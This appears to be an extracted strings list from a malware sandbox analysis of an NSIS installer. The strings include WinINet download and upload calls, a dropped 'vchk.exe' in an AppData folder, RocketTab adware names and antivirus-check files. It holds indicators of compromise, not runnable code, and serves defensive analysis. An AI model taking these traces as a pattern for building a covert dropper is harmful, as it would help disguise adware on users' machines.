RegDeleteKeyExA

RegDeleteKeyExA

%s=%s

%s=%s

*?|/":

*?|/":

CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsiF.tmp\nsExec.dll

CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsiF.tmp\nsExec.dll

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsiF.tmp\nsExec.dll

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsiF.tmp\nsExec.dll

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsiF.tmp

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsiF.tmp

.reloc

.reloc

SShL0

SShL0

PeekNamedPipe

PeekNamedPipe

CreatePipe

CreatePipe

nsExec.dll

nsExec.dll

99|9

99|9

: :0:5:>:

: :0:5:>:

u.Uj@

u.Uj@

MSVCRT.dll

MSVCRT.dll

HttpSendRequestA

HttpSendRequestA

HttpSendRequestExA

HttpSendRequestExA

HttpQueryInfoA

HttpQueryInfoA

FtpCreateDirectoryA

FtpCreateDirectoryA

FtpOpenFileA

FtpOpenFileA

HttpOpenRequestA

HttpOpenRequestA

HttpAddRequestHeadersA

HttpAddRequestHeadersA

HttpEndRequestA

HttpEndRequestA

InternetCrackUrlA

InternetCrackUrlA

WININET.dll

WININET.dll

inetc.dll

inetc.dll

Open URL Error

Open URL Error

URL Parts Error

URL Parts Error

FtpCreateDir failed (550)

FtpCreateDir failed (550)

Error FTP path (550)

Error FTP path (550)

Downloading %s

Downloading %s

%dkB (%d%%) of %dkB @ %d.dkB/s

%dkB (%d%%) of %dkB @ %d.dkB/s

(%d %s%s remaining)

(%d %s%s remaining)

REST %d

REST %d

SIZE %s

SIZE %s

Content-Length: %d

Content-Length: %d

Content-Type: application/x-www-form-urlencoded

Content-Type: application/x-www-form-urlencoded

Authorization: basic %s

Authorization: basic %s

Proxy-authorization: basic %s

Proxy-authorization: basic %s

%s:%s

%s:%s

FtpCommandA

FtpCommandA

wininet.dll

wininet.dll

%u MB

%u MB

%u kB

%u kB

%u bytes

%u bytes

%d:d:d

%d:d:d

%s - %s

%s - %s

(Err=%d)

(Err=%d)

NSIS_Inetc (Mozilla)

NSIS_Inetc (Mozilla)

Filename: %s

Filename: %s

/password

/password

Uploading %s

Uploading %s

9!9-9B9}9

9!9-9B9}9

g.ZO||k[

g.ZO||k[

C:\a\avchk.txt

C:\a\avchk.txt

avchk.txt

avchk.txt

\LOCALS~1\Temp\nsiF.tmp

\LOCALS~1\Temp\nsiF.tmp

hk.txt

hk.txt

cketTab1.exe

cketTab1.exe

e.exe

e.exe

"%Documents and Settings%\%current user%\Local Settings\Application Data\yuntnani\vchk.exe"

"%Documents and Settings%\%current user%\Local Settings\Application Data\yuntnani\vchk.exe"

%Documents and Settings%\%current user%\Local Settings\Application Data\yuntnani

%Documents and Settings%\%current user%\Local Settings\Application Data\yuntnani

vchk.exe

vchk.exe

CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsiE.tmp

CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsiE.tmp

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\

%Documents and Settings%\%current user%\Local Settings\Application Data\yuntnani\vchk.exe

%Documents and Settings%\%current user%\Local Settings\Application Data\yuntnani\vchk.exe

RocketTab1.exe

RocketTab1.exe

Nullsoft Install System v2.46

Nullsoft Install System v2.46

vchk.exe_1976_rwx_10004000_00001000:

callback%d

callback%d